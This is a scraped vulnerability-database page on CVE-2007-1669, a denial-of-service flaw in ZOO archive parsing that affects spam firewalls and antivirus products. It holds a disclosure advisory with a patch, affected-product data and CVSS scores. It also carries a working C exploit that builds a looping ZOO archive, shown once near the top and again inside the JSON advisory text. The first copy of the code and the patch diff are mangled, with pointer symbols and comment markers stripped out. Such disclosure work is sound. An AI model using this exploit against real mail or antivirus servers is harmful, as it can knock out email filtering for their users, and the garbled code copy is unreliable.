void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }

FILE * open_file (char *filename) {

     FILE *fp;

     fp = fopen ( filename , "w" );

     if (!fp) {
             perror ("Cant open file");
             exit (1);
     }

     return fp;

}

void usage (char *progname) {

     printf ("\nTo use:\n");
     printf ("%s <archive name>\n\n", progname);

     exit (1);

}

int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;

     if ( argc != 2) {
             usage ( argv[0] );
     }

     strncpy (filename, argv[1], 255);

     if (!hdr || !filename) {
             perror ("Error allocating memory");
             exit (1);
     }

     memset (hdr, 0x00, 4096);

     // Build a ZOO header
     memcpy          (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
     put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);
     put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
     put_longword    (hdr + ZH_NEG_START_OFFSET,
         (ZOO_HEADER_SIZE) * -1);
     put_byte        (hdr + ZH_MAJ_VER, 2);
     put_byte        (hdr + ZH_MIN_VER, 0);
     put_byte        (hdr + ZH_ARC_HTYPE, 1);
     put_longword    (hdr + ZH_ARC_COMMENT, 0);
     put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);
     put_byte        (hdr + ZH_VERSION_DATA, 3);

     // Build vulnerable direntry struct
     put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
     put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
     put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
     put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
     put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
     memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,
                         "AAAAAAAA.AAA", 13);

     total_size = ZOO_HEADER_SIZE + 51;

     fp = open_file (filename);

     if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
             printf ("The file has been written\n");
     } else {
             printf ("Cant write to the file\n");
             exit (1);
     }

     fclose (fp);

     return 0;

}

VII. PATCH

To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:

diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /

static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }

#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /

loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /

diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /

while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }

  • / Begin tracking our position in the file /
  • zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
  • / Make sure we are not seeking to already processed data /
  • if (direntry.next <= zoo_pointer)
  • prterror ('f', "ZOO chain structure is corrupted\n");
  • zoo_pointer = direntry.next;
             /* ..seek to next dir entry */
    zooseek (zoo_file, direntry.next, 0);
    

VIII. CREDITS

Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.

IX. REFERENCES

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669

  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670

  3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671

  4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672

  5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673

X. HISTORY

2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0183",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "amavis",
            scope: "lte",
            trust: 1.8,
            vendor: "amavis",
            version: "2.4.1",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.8,
            vendor: "barracuda",
            version: "3.4 and later",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.6,
            vendor: "panda",
            version: "5.53",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.3",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.0.54",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.03.055",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.15.026",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.1.18",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.1.17",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.4",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.01.001",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.03.053",
         },
         {
            model: "zoo",
            scope: "eq",
            trust: 0.3,
            vendor: "zoo",
            version: "2.10",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.605",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.5",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.60",
         },
         {
            model: "unzoo",
            scope: "eq",
            trust: 0.3,
            vendor: "unzoo",
            version: "4.4-2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.1",
         },
         {
            model: "titanium antivirus antispyware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006+",
         },
         {
            model: "titanium antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2005",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "20070",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006",
         },
         {
            model: "antivirus platinum",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "antivirus for netware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.54.1",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.0",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.15026",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.18",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.17",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.055",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.053",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.022",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.01.001",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.0.54",
         },
         {
            model: "desktop for windows",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "1.00.00.68",
         },
         {
            model: "antivir workstation professional build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "367",
         },
         {
            model: "antivir personaledition premium build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "228",
         },
         {
            model: "antivir personaledition classic build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "180",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "6.35.00.00",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5-1",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.726",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.676",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.660",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.566",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.489",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.460",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.603",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "antivirus managed client",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.394",
         },
         {
            model: "antivirus managed client",
            scope: null,
            trust: 0.3,
            vendor: "avast",
            version: null,
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.655",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "2.4.1",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
      trust: 0.9,
   },
   cve: "CVE-2007-1669",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2007-1669",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-25031",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2007-1669",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-200705-120",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-25031",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nJoin the FREE BETA test of the Network Software Inspector (NSI)!\nhttp://secunia.com/network_software_inspector/\n\nThe NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\nThe vulnerability is caused due to an error in the handling of Zoo\narchives. This can be exploited to cause an infinite loop resulting\nin high CPU utilisation. \n\nSOLUTION:\nUpdate to firmware version 3.4 and virus definition 2.0.6399 or\nlater. \n\nPROVIDED AND/OR DISCOVERED BY:\nJean-Sebastien Guay-Leroux\n\nORIGINAL ADVISORY:\nBarracuda Networks:\nhttp://www.barracudanetworks.com/ns/resources/tech_alert.php\n\nJean-Sebastien Guay-Leroux:\nhttp://www.guay-leroux.com/projects/zoo-infinite-advisory.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Topic:                  Multiple vendors ZOO file decompression infinite\n                         loop DoS\n\nAnnounced:              2007-05-04\nCredits:                Jean-Sebastien Guay-Leroux\nProducts:               Multiple (see section III)\nImpact:                 DoS (99% CPU utilisation)\nCVE ID:                 CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n                         CVE-2007-1672, CVE-2007-1673\n\n\nI.      BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII.  The vulnerability lies in the algorithm used to locate the\nfiles inside the archive.  Each file in a ZOO archive is identified by a\ndirentry structure.  Those structures are linked between themselves with a\n'next' pointer.  This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure.  By specifying an\nalready processed file, it's possible to process more than one time this\nsame file.  The ZOO parser will then enter an infinite loop condition. \n\n\nIII.    AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV.     IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV.      SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n   They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and\n   2.0.6399o for firmware < 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n   They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n   They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n   They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n   This software is not maintained anymore.  A patch for version 2.10 is\n   provided in section VII of this advisory because some SMTP content\n   filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n   This software is not maintained anymore.  No patch is provided for this\n   software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI.     PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE         0x0000002a\n\n#define ZH_TEXT                 0\n#define ZH_TAG                  20\n#define ZH_START_OFFSET         24\n#define ZH_NEG_START_OFFSET     28\n#define ZH_MAJ_VER              32\n#define ZH_MIN_VER              33\n#define ZH_ARC_HTYPE            34\n#define ZH_ARC_COMMENT          35\n#define ZH_ARC_COMMENT_LENGTH   39\n#define ZH_VERSION_DATA         41\n\n\n#define D_DIRENTRY_LENGTH       56\n\n#define D_TAG                   0\n#define D_TYPE                  4\n#define D_PACKING_METHOD        5\n#define D_NEXT_ENTRY            6\n#define D_OFFSET                10\n#define D_DATE                  14\n#define D_TIME                  16\n#define D_FILE_CRC              18\n#define D_ORIGINAL_SIZE         20\n#define D_SIZE_NOW              24\n#define D_MAJ_VER               28\n#define D_MIN_VER               29\n#define D_DELETED               30\n#define D_FILE_STRUCT           31\n#define D_COMMENT_OFFSET        32\n#define D_COMMENT_SIZE          36\n#define D_FILENAME              38\n#define D_VAR_DIR_LEN           51\n#define D_TIMEZONE              53\n#define D_DIR_CRC               54\n#define D_NAMLEN                ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN                ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME             ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n         *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n         put_byte (ptr + 2, data >> 16);\n         put_byte (ptr + 3, data >> 24);\n}\n\nFILE * open_file (char *filename) {\n\n         FILE *fp;\n\n         fp = fopen ( filename , \"w\" );\n\n         if (!fp) {\n                 perror (\"Cant open file\");\n                 exit (1);\n         }\n\n         return fp;\n}\n\nvoid usage (char *progname) {\n\n         printf (\"\\nTo use:\\n\");\n         printf (\"%s <archive name>\\n\\n\", progname);\n\n         exit (1);\n}\n\nint main (int argc, char *argv[]) {\n         FILE *fp;\n         char *hdr = (char *) malloc (4096);\n         char *filename = (char *) malloc (256);\n         int written_bytes;\n         int total_size;\n\n         if ( argc != 2) {\n                 usage ( argv[0] );\n         }\n\n         strncpy (filename, argv[1], 255);\n\n         if (!hdr || !filename) {\n                 perror (\"Error allocating memory\");\n                 exit (1);\n         